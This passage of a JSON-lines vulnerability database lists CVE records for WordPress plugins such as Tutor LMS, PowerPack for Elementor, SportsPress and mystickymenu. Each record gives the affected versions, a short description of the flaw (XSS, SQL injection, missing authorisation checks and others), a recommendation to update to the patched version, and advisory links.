version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dcacaf-0e2a-4bef-b944-fb7e43d25777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dcacaf-0e2a-4bef-b944-fb7e43d25777?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-state-city-auto-dropdown\\\/trunk\\\/includes\\\/ajax-actions.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089374%40country-state-city-auto-dropdown%2Ftrunk&old=3068802%40country-state-city-auto-dropdown%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089374%40country-state-city-auto-dropdown%2Ftrunk&old=3068802%40country-state-city-auto-dropdown%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7133","slug":"mystickymenu","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any   WordPress plugin before 2.7.3 does not validate and escape some of its settings before outputting them back in the page, which could allow users with a high role to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c81c1622-33d1-41f2-ba63-f06bd4c125ab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c81c1622-33d1-41f2-ba63-f06bd4c125ab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0371","slug":"jet-elements","versionImpact":"2.7.2.1","versionEndExcluding":"2.7.3","description":"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 2.7.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded2f366-375c-4cf6-9cbd-c969a3b3d6d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ded2f366-375c-4cf6-9cbd-c969a3b3d6d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1549","slug":"ad-inserter","versionEndExcluding":"2.7.27","description":"The Ad Inserter WordPress plugin before 2.7.27 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c94b3a68-673b-44d7-9251-f3590cc5ee9e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c94b3a68-673b-44d7-9251-f3590cc5ee9e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3986","slug":"sportspress","versionImpact":"2.7.21","versionEndExcluding":"2.7.22","description":"The SportsPress  WordPress plugin before 2.7.22 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.7.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76c78f8e-e3da-47d9-9bf4-70e9dd125b82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76c78f8e-e3da-47d9-9bf4-70e9dd125b82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5327","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.19","versionEndExcluding":"2.7.20","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018pp_animated_gradient_bg_color\u2019 parameter in all versions up to, and including, 2.7.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5618fdfc-636f-452b-80e1-5182b068d1c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5618fdfc-636f-452b-80e1-5182b068d1c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.19\\\/extensions\\\/animated-gradient-background.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/tags\\\/2.7.19\\\/extensions\\\/animated-gradient-background.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094253\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094253\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50889","slug":"beaver-builder-lite-version","versionEndExcluding":"2.7.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in The Beaver Builder Team Beaver Builder \u2013 WordPress Page Builder allows Stored XSS.This issue affects Beaver Builder \u2013 WordPress Page Builder: from n\/a through 2.7.2.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/beaver-builder-lite-version\\\/wordpress-beaver-builder-plugin-2-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/beaver-builder-lite-version\\\/wordpress-beaver-builder-plugin-2-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4090","slug":"mystickymenu","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any   WordPress plugin before 2.7.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aedcb986-0f2b-4852-baf1-6cb61e83e109\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aedcb986-0f2b-4852-baf1-6cb61e83e109\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3520","slug":"country-state-city-auto-dropdown","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tc_csca_patch_settings function in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with subscriber access and above, to add states or cities to the dropdown.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ccd4a3-ea1f-49b3-b4ce-ab1e247e1f76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08ccd4a3-ea1f-49b3-b4ce-ab1e247e1f76?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068802\\\/country-state-city-auto-dropdown\\\/trunk?contextall=1&old=2751425&old_path=%2Fcountry-state-city-auto-dropdown%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3068802\\\/country-state-city-auto-dropdown\\\/trunk?contextall=1&old=2751425&old_path=%2Fcountry-state-city-auto-dropdown%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5438","slug":"tutor","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.7.1 via the 'attempt_delete' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Instructor-level access and above, to delete arbitrary quiz attempts.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec14d4-d97b-40b1-b61b-05e911f49bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec14d4-d97b-40b1-b61b-05e911f49bb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Quiz.php#L1806\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Quiz.php#L1806\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098465\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098465\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4902","slug":"tutor","versionImpact":"2.7.1","versionEndExcluding":"2.7.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018course_id\u2019 parameter in all versions up to, and including, 2.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with admin access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00e8169-3b8f-44a0-9af2-e81777a913f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00e8169-3b8f-44a0-9af2-e81777a913f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L1936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L1936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3098465%40tutor%2Ftrunk&old=3086489%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3098465%40tutor%2Ftrunk&old=3086489%40tutor%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1178","slug":"sportspress","versionEndExcluding":"2.7.18","description":"The SportsPress \u2013 Sports Club & League Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37977","slug":"wpfunnels","versionEndExcluding":"2.7.17","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WPFunnels Team Drag & Drop Sales Funnel Builder for WordPress \u2013 WPFunnels plugin <=\u00a02.7.16 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpfunnels\\\/wordpress-wpfunnels-plugin-2-7-16-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpfunnels\\\/wordpress-wpfunnels-plugin-2-7-16-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1564","slug":"wp-schema-pro","versionImpact":"2.7.15","versionEndExcluding":"2.7.16","description":"The wp-schema-pro WordPress plugin before 2.7.16 does not validate post access allowing a contributor user to access custom fields on any post regardless of post type or status via a shortcode","recommendation":"Update to version 2.7.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ecb1e36f-9c6e-4754-8878-03c97194644d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ecb1e36f-9c6e-4754-8878-03c97194644d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1055","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.14","versionEndExcluding":"2.7.15","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/trunk\\\/modules\\\/buttons\\\/widgets\\\/buttons.php#L1544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-lite-for-elementor\\\/trunk\\\/modules\\\/buttons\\\/widgets\\\/buttons.php#L1544\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6984","slug":"powerpack-lite-for-elementor","versionEndExcluding":"2.7.14","description":"The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.13. This is due to missing or incorrect nonce validation in the powerpack-lite-for-elementor\/classes\/class-pp-admin-settings.php file. This makes it possible for unauthenticated attackers to modify and reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe2cfc96-63f4-4e4b-bf49-6031594a4805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe2cfc96-63f4-4e4b-bf49-6031594a4805?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015474%40powerpack-lite-for-elementor&new=3015474%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015474%40powerpack-lite-for-elementor&new=3015474%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12711","slug":"rsvp","versionImpact":"2.7.13","versionEndExcluding":"2.7.14","description":"The RSVP and Event Management plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX functions like bulk_delete_attendees() and bulk_delete_questions() in all versions up to, and including, 2.7.13. This makes it possible for unauthenticated attackers to delete questions and attendees and for authenticated users to update question menu orders.","recommendation":"Update to version 2.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216473%40rsvp&new=3216473%40rsvp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3216473%40rsvp&new=3216473%40rsvp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d234212a-2019-477d-81d1-b2acc2321055?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d234212a-2019-477d-81d1-b2acc2321055?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1310","slug":"job-postings","versionImpact":"2.7.11","versionEndExcluding":"2.7.12","description":"The Jobs for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.7.11 via the 'job_postings_get_file' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.7.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-postings\\\/tags\\\/2.7.11\\\/include\\\/class-job-get-uploaded-file.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-postings\\\/tags\\\/2.7.11\\\/include\\\/class-job-get-uploaded-file.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257145%40job-postings&new=3257145%40job-postings&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257145%40job-postings&new=3257145%40job-postings&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/408312d3-9a9e-4b6b-9991-aee6b77745b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/408312d3-9a9e-4b6b-9991-aee6b77745b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10134","slug":"simple-backup","versionEndExcluding":"2.7.11","description":"The Simple Backup plugin for WordPress is vulnerable to Arbitrary File Download in versions up to, and including, 2.7.10. via the download_backup_file function. This is due to a lack of capability checks and file type validation. This makes it possible for attackers to download sensitive files such as the wp-config.php file from the affected site.","recommendation":"Update to version 2.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131919\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131919\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29482b70-0ff2-4bb1-9d41-9cffb83b5ad0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29482b70-0ff2-4bb1-9d41-9cffb83b5ad0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10105","slug":"job-postings","versionImpact":"2.7.10","versionEndExcluding":"2.7.11","description":"The Job Postings WordPress plugin before 2.7.11 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4477db12-26e9-4c6d-8b71-f3f6a0d19813\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4477db12-26e9-4c6d-8b71-f3f6a0d19813\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1909","slug":"buddyboss-platform-pro","versionImpact":"2.7.01","versionEndExcluding":"2.7.10","description":"The BuddyBoss Platform Pro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.01. This is due to insufficient verification on the user being supplied during the Apple OAuth authenticate request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 2.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/2-7-10\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-pro-releases\\\/2-7-10\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cce9b8b-0589-4b09-b184-a66fc86fcb46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cce9b8b-0589-4b09-b184-a66fc86fcb46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6991","slug":"wp-file-get-contents","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The JSM file_get_contents() Shortcode WordPress plugin before 2.7.1 does not validate one of its shortcode's parameters before making a request to it, which could allow users with contributor role and above to perform SSRF attacks.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b92becb-8a47-48fd-82e8-f7641cf5c9bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b92becb-8a47-48fd-82e8-f7641cf5c9bc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3436","slug":"coreactivity","versionImpact":"2.7","versionEndExcluding":"2.7.1","description":"The coreActivity: Activity Logging for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'order' and 'orderby' parameters in all versions up to, and including, 2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259839\\\/coreactivity\\\/trunk\\\/core\\\/table\\\/Live.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259839\\\/coreactivity\\\/trunk\\\/core\\\/table\\\/Live.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1ebbb18-0266-49e8-ada3-b63905021846?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1ebbb18-0266-49e8-ada3-b63905021846?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4223","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete data.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce4c4395-6d1a-4d5f-885f-383e5c44c0f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce4c4395-6d1a-4d5f-885f-383e5c44c0f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4318","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018question_id\u2019 parameter in versions up to, and including, 2.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Instructor-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bbb3c65-f02c-4d6d-bd4e-b3232af5e21b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bbb3c65-f02c-4d6d-bd4e-b3232af5e21b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4456\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4456\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
